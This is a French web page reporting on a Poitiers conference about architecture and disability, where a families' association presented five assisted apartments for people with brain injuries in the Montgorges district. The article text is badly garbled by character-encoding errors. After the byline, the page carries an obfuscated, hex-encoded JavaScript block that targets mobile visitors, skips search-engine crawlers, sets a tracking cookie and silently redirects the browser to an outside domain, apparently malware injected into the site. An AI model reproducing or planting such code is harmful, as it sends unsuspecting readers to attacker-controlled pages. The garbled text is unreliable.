A�la��AFTC A�POITOU-CHARENTES a prA�sentA� les cinq logements accompagnA�s des Montgorges

A� la confA�rence A�A�Architecture et handicapA�A�

Maison de la��Architecture

1,rue de la TranchA�e A� Poitiers A� 19h.

Mardi 30 Mai

« Architecture et Handicap : jusqu’oA? aller dans l’accessibilitA�? »A� http://mdapc.fr/schedule/architecture-et-handicap/

A�taient donc prA�sents :

  • Nadia Sahmi,A�architecte spA�cialisA�e dans les questions da��accessibilitA� et de qualitA� de vie pour tous
  • Guy Le Charpentier, co-gA�rant de l’entreprise ReSantA�-vous
  • Bernard Cornu, adjoint dA�lA�guA� A� la��urbanisme de la Ville de Poitiers
  • Abderrazak Halloumi, adjoint au maire de Poitiers en charge duA�handicap et des luttes contre les discriminations.A�Conseiller communautaire de Grand Poitiers.
  • La��association AFTC Poitou-CharentesA�(Association des familles de traumatisA�s crA?niens et de cA�rA�bro-lA�sA�s) reprA�sentA�e par Mme Del Degan

A�ARTICLE NOUVELLE A�REPUBLIQUE A�de Marie-Catherine Bernard

Depuis moins d’un an, des personnes traumatisA�es crA?niennes rA�sident dans des appartements du quartier des Montgorges, dans un immeuble qui hA�berge A�galement des seniors et des familles. Cette A�A�inclusionA�A� est due A� la volontA� de l’Association des familles de traumatisA�s crA?niens et cA�rA�brolA�sA�s du Poitou-Charentes (1). Mardi, A� la Maison de l’architecture, Marie-FranA�oise Del Degan, membre du conseil d’administration, a A�voquA� la construction du projet dans le cadre d’une confA�rence sur A�A�Architecture et handicap, jusqu’oA? aller dans l’accessibilitA�a��?A�A�. 70A�personnes (dont de nombreuxA�A�tudiants en ergothA�rapie, des architectes) ont participA� A� cette rencontre inscrite dans le programme du festival Les Accessifs.

Marie-FranA�oise Del Degan, dont la fille a A�tA� victime d’un gravissime accident avenue de la LibA�ration, a tA�moignA� A� quel point ces A�vA�nements fracassaient des vies.A�A�A�Il faut tout repenser qu’il s’agisse du quotidien, de l’habitat, du cheminementA�A�,A�souligne-t-elle. AprA?s avoir sA�journA� de longs mois dans des A�tablissements spA�cialisA�s, des handicapA�s ne veulent plus de structures.A�A�A�Ils veulent revenir A� la vie d’avant, vivre chez eux, A� leur rythme, parmi les autres mais avec une aide adaptA�e. D’oA? la nA�cessitA� de crA�er d’autres types d’habitat.A�A�

« a��Faire du beau est possiblea��!a�� »

Le projet aux Montgorges a A�tA� montA� avec le bailleur social Logiparc (dA�sormais Ekidom). Cinq appartements de 53A�m2A�sont disponibles, quatre occupA�s, la salle de repas et la buanderie sont communes. Cinq assistantes de vie assurent une prA�sence quotidienne.
Quelques couacs dans l’amA�nagement des appartements pouvant A�ventuellement A?tre destinA�s A� des A�A�validesA�A� ont A�tA� pointA�s du doigt. Ils ont fait bondir l’architecte tourangelle Nadia Sahmi, spA�cialisA�e dans les questions d’accessibilitA� et de qualitA� de vie pour tous.A�A�A�Ce n’est pas parce qu’on est handicapA� qu’on doit subir A�aa��!,A�s’insurge-t-elle.A�Faire du beau est possibleA�- l’exposition le dA�montreA�(2)– et c’est l’affaire des architectes, mais A� condition de partir du projet de vie, du projet de quartier. Il faut avoir une approche humaine.A�A�A�Elle a participA� A� la rA�daction de la loi sur l’accessibilitA� de 2005, mais celle-ci aA�A�A�cloisonnA� « a��les handicapA�sa�� », « a��les vieuxa�� », au lieu de penser au vivre avec. Il faut donc faire autrement, chercher des dA�nominateurs communs utilisables par tout le mondeA�A�.
Les A�cueils de la loi de 2005A�ont A�galement A�tA� critiquA�s par Abderrazak Halloumi, adjoint au maire A� l’accessibilitA�. Il prA�coniseA�A�A�d’aller vers une forme d’accessibilitA� raisonnA�eA�A�.
Pour Bernard Cornu, adjoint A� l’urbanisme, si les espaces vierges comme les Montgorges sont propices A� la mixitA� humaine, l’existant plein d’embA�ches l’est moins. Toutefois, il faudra rendre la ville peu A� peu accessible A� tous.

(1) www.aftc-poitoucharentes.fr (2) A�A�Quand l’architecture efface le handicapA�A� A� la MDA, 1,A�rue de la TranchA�e. TA�l. 05.49.42.89.79.

Marie-Catherine Bernard

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}